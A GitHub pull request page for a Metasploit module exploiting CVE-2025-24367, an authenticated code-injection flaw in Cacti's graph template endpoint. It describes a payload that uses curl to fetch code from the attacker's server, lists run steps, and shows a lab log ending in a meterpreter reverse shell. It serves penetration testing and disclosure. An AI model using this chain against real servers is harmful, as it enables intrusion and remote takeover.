Skip to content

Cacti Graph Template Authenticated RCE [CVE-2025-24367] #20799

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
jheysel-r7 wants to merge 2 commits into
base: master
Choose a base branch
from
Open

Cacti Graph Template Authenticated RCE [CVE-2025-24367] #20799

jheysel-r7 wants to merge 2 commits into from
+601 −0

Conversation

@jheysel-r7
Copy link
Contributor

@jheysel-r7 jheysel-r7 commented Dec 22, 2025
edited
Loading

This module exploits an authenticated remote code execution vulnerability in Cacti versions prior to 1.2.29. Authenticated users can upload a graph template through the /graph_templates.php endpoint. The right_axis_label parameter is vulnerable to code injection, allowing attackers to execute arbitrary commands on the server. The payload is length limited, due to this constraint the module starts an HTTP server and hosts the payload. The initial payload downloads the full payload using curl from the attacker's server and saves it to the web root of the cacti server before executing.

Verification

  1. Install the application
  2. Start msfconsole
  3. Do: use linux/http/cacti_graph_template_rce
  4. Do: set target <target>
  5. Do: run rhost=<target address> rport=<target port> lhost=<local address> username=<username> password=<password>
  6. You should get a shell.

Testing

Linux target Cacti 1.2.28

msf exploit(linux/http/cacti_graph_template_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/http/cacti_graph_template_rce) > run rhost=172.16.199.136 rport=8080 lhost=172.16.199.1 srvhost=172.16.199.1 srvport=9090 username=admin password=admin
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.199.1:4444
msf exploit(linux/http/cacti_graph_template_rce) > [*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking Cacti version
[+] The web server is running Cacti version 1.2.28
[*] Attempting login with user `admin` and password `admin`
[+] Logged in
[+] The target is vulnerable.
[*] Using URL: http://172.16.199.1:9090/y
[*] Template update response: HTTP 200
[*] Trigger template update response: HTTP 200
[*] 172.16.199.136   cacti_graph_template_rce - Request 'GET /y'
[*] 172.16.199.136   cacti_graph_template_rce - Sending payload ...
[+] PHP payload uploaded successfully to /cacti/X.php
[*] Template update response: HTTP 200
[*] Trigger template update response: HTTP 200
[*] Sending stage (3090404 bytes) to 172.16.199.136
[+] Deleted X.php
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.136:44642) at 2025-12-21 23:27:10 -0800
msf exploit(linux/http/cacti_graph_template_rce) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
sysServer username: www-data
infometerpreter > sysinfo
Computer     : 172.18.0.3
OS           : Debian 11.5 (Linux 6.8.0-90-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit

@jheysel-r7 jheysel-r7 changed the title Cacti Graph Template Authenticated RCE Cacti Graph Template Authenticated RCE [CVE-2025-24367] Dec 23, 2025
@jheysel-r7 jheysel-r7 added module rn-modules release notes for new or majorly enhanced modules docs labels Dec 23, 2025
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

docs module rn-modules release notes for new or majorly enhanced modules

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@jheysel-r7